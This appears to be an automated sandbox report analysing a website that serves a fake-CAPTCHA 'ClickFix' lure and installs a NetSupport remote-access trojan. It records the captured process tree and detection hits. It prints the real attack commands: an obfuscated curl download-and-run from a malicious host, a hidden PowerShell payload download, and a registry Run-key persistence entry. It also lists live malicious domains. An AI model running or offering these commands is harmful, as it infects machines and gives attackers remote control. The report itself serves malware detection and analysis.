Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://fountainofhealth.ca

Overview

General Information

Sample URL:http://fountainofhealth.ca
Analysis ID:1696974
Infos:

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
Installs a global event hook (focus changed)
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Uses threadpools to delay analysis
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • rundll32.exe (PID: 7060 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 , MD5: EF3179D498793BF4234F708D3BE28633)
  • osk.exe (PID: 7252 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
  • osk.exe (PID: 5744 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
    • explorer.exe (PID: 4280 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • conhost.exe (PID: 4124 cmdline: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 676 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7264 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 7288 cmdline: cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 740 cmdline: cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • curl.exe (PID: 7116 cmdline: curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
          • cmd.exe (PID: 3664 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 688 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2500 cmdline: powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • client32.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Options\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
            • reg.exe (PID: 1516 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Options\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\Options\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\Options\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\Options\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\Options\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 9 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      37.0.client32.exe.d30000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        37.2.client32.exe.707b0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          34.2.powershell.exe.28fcf164fe0.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            34.2.powershell.exe.28fcf0141a8.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              37.2.client32.exe.6cf80000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 6 entries

                                HTML

                                SourceRuleDescriptionAuthorStrings
                                0.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Suspicious Invoke-WebRequest Execution
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Sigma detected: Conhost Spawned By Uncommon Parent Process
                                  Source: Process startedAuthor: Tim Rauch: Data: Command: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, CommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, CommandLine|base64offset|contains: , Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4280, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, ProcessId: 4124, ProcessName: conhost.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Options\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Support11
                                  Sigma detected: Direct Autorun Keys Modification
                                  Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, ProcessId: 1516, ProcessName: reg.exe
                                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
                                  Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, ProcessId: 1516, ProcessName: reg.exe
                                  Sigma detected: Potentially Suspicious Rundll32 Activity
                                  Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3728, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, ProcessId: 7060, ProcessName: rundll32.exe
                                  Sigma detected: PowerShell Web Download
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Sigma detected: Powershell drops NetSupport RAT client
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Roaming\Options\NSM.LIC

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-05-22T17:04:35.910960+020020613851Exploit Kit Activity Detected192.168.2.17558811.1.1.153UDP
                                  2025-05-22T17:04:35.911182+020020613851Exploit Kit Activity Detected192.168.2.17617831.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-05-22T17:04:36.632094+020020613881Exploit Kit Activity Detected192.168.2.174973323.23.49.179443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-05-22T17:04:33.346833+020020358941A Network Trojan was detected192.168.2.174979694.158.245.131443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-05-22T17:04:33.346833+020028277451Malware Command and Control Activity Detected192.168.2.174979694.158.245.131443TCP
                                  2025-05-22T17:05:56.618907+020028277451Malware Command and Control Activity Detected192.168.2.174979694.158.245.131443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-05-22T17:05:42.030046+020018100002Potentially Bad Traffic192.168.2.174979535.206.121.228443TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus detection for URL or domain
                                  Source: https://lang3666.top/lv/xfa.jsAvira URL Cloud: Label: malware
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeReversingLabs: Detection: 18%
                                  Source: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeReversingLabs: Detection: 16%
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,37_2_110AD570

                                  Phishing

                                  barindex
                                  Yara detected CAPTCHA Scam ClickFix
                                  Source: Yara matchFile source: 0.2.pages.csv, type: HTML
                                  HTML page contains obfuscated javascript
                                  Source: https://islonline.org/d.jsHTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
                                  Source: https://fountainofhealth.ca/enHTTP Parser: No favicon
                                  Source: https://fountainofhealth.ca/enHTTP Parser: No favicon
                                  Source: https://fountainofhealth.ca/enHTTP Parser: No favicon
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dllJump to behavior
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49742 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49779 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49780 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49781 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.17:49782 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49783 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49785 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49787 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 52.140.48.131:443 -> 192.168.2.17:49786 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49788 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49789 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 193.111.208.110:443 -> 192.168.2.17:49794 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 35.206.121.228:443 -> 192.168.2.17:49795 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.204.88.70:443 -> 192.168.2.17:49799 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49803 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.17:49804 version: TLS 1.2
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,37_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,37_2_11065890
